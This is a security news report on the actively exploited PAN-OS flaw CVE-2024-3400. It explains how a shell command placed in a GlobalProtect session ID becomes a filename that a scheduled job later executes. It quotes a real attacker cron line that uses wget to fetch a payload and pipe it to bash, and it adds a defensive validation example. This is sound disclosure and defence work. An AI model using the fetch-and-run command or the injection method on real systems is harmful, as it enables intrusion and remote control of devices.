Palo Alto Networks has shared additional details of a critical security flaw affecting PAN-OS that has come under active exploitation in the wild by malicious actors.
The company described the vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), as "intricate" and a combination of two bugs in versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 of the software.
"In the first one, the GlobalProtect service did not sufficiently validate the session ID format before storing them. This enabled the attacker to store an empty file with the attacker's chosen filename," Chandan B. N., senior director of product security at Palo Alto Networks, said.
“The second bug (trusting that the files were system-generated) used the filenames as part of a command.”
It is worth noting that while neither of the issues is critical enough on its own, when chained together they can lead to unauthenticated remote shell command execution.
Palo Alto Networks said that the threat actor behind the zero-day exploitation of the flaw, UTA0218, carried out a two-stage attack to achieve command execution on susceptible devices. The activity is being tracked under the name Operation MidnightEclipse.
As previously disclosed by both Volexity and the network security company's own Unit 42 threat intelligence division, this involves sending specially crafted requests containing the command to be executed, which is then run via a backdoor referred to as UPSTYLE.
"The initial persistence mechanism setup by UTA0218 involved configuring a cron job that would use wget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and piped to bash for execution," Volexity noted last week.
“The attacker used this method to deploy and execute specific commands and download reverse proxy tooling such as GOST (GO Simple Tunnel).”
Unit 42 said it has been unable to determine the commands executed via this mechanism (wget -qO- hxxp://172.233.228[.]93/policy | bash), but assessed that the cron job-based implant is likely used to carry out post-exploitation activities.
"In stage 1, the attacker sends a carefully crafted shell command instead of a valid session ID to GlobalProtect," Chandan explained. "This results in creating an empty file on the system with an embedded command as its filename, as chosen by the attacker."
“In stage 2, an unsuspecting scheduled system job that runs regularly uses the attacker-provided filename in a command. This results in the execution of the attacker-supplied command with elevated privileges.”
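The two-stage chain described above comes down to two missing controls: an allow-list check on the session ID before it becomes a filename, and a scheduled job that hands filenames to a shell. The following added example (not Palo Alto Networks' code; the session-ID format, directory layout and cleanup command are assumptions) shows both controls as a defender would write them.

```python
import re
import subprocess
from pathlib import Path

# Assumed session-ID format for this example; the real PAN-OS format is not
# described in the article. Only an alphanumeric token of bounded length passes.
SESSION_ID_RE = re.compile(r"\A[A-Za-z0-9]{16,64}\Z")


def is_valid_session_id(session_id: str) -> bool:
    """Allow-list check: anything that is not the expected token is rejected."""
    return SESSION_ID_RE.fullmatch(session_id) is not None


def session_file_path(session_dir: Path, session_id: str) -> Path:
    """Map a session ID to a file path (the first bug skipped this validation).

    Rejects IDs that fail the allow-list and, as defence in depth, any result
    that would not sit directly inside the session directory."""
    if not is_valid_session_id(session_id):
        raise ValueError("rejected session ID: unexpected format")
    path = (session_dir / session_id).resolve()
    if path.parent != session_dir.resolve():
        raise ValueError("rejected session ID: path escapes session directory")
    return path


def plan_cleanup(session_dir: Path, names: list[str]) -> list[list[str]]:
    """Scheduled-job side (the second bug trusted these names).

    Builds argv lists for a hypothetical cleanup task. Names are re-validated
    and skipped if they fail, and the command is an argument vector, never a
    shell string, so metacharacters in a filename cannot become commands."""
    commands = []
    for name in names:
        if not is_valid_session_id(name):
            continue  # unexpected name: leave it for investigation, do not touch it
        commands.append(["/bin/rm", "-f", "--", str(session_dir / name)])
    return commands


def run_cleanup(session_dir: Path) -> None:
    """Run the planned cleanup with shell=False so no shell parses the names."""
    names = [entry.name for entry in session_dir.iterdir()]
    for argv in plan_cleanup(session_dir, names):
        subprocess.run(argv, shell=False, check=False)


if __name__ == "__main__":
    # Constructed sample names: one valid token, two that must be rejected.
    print(plan_cleanup(Path("/tmp/sessions"), ["abcdef0123456789ABCDEF", "a;b", "../x"]))
```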
While Palo Alto Networks initially noted that successful exploitation of CVE-2024-3400 required the firewall to be configured for GlobalProtect gateway or GlobalProtect portal (or both) and to have device telemetry enabled, the company has since confirmed that device telemetry has no bearing on the issue.
This is based on new findings from Bishop Fox, which discovered bypasses to weaponize the flaw such that it did not require telemetry to be enabled on a device in order to infiltrate it.
The company has also expanded patches for the flaw over the past few days to cover other commonly deployed maintenance releases:
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
In light of the active abuse of CVE-2024-3400 and the availability of proof-of-concept (PoC) exploit code, users are recommended to apply the hotfixes as soon as possible to safeguard against potential threats.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, ordering federal agencies to secure their devices by April 19, 2024.
According to information shared by the Shadowserver Foundation, roughly 22,542 internet-exposed firewall devices are likely vulnerable to CVE-2024-3400. A majority of the devices are in the U.S., Japan, India, Germany, the U.K., Canada, Australia, France, and China as of April 18, 2024.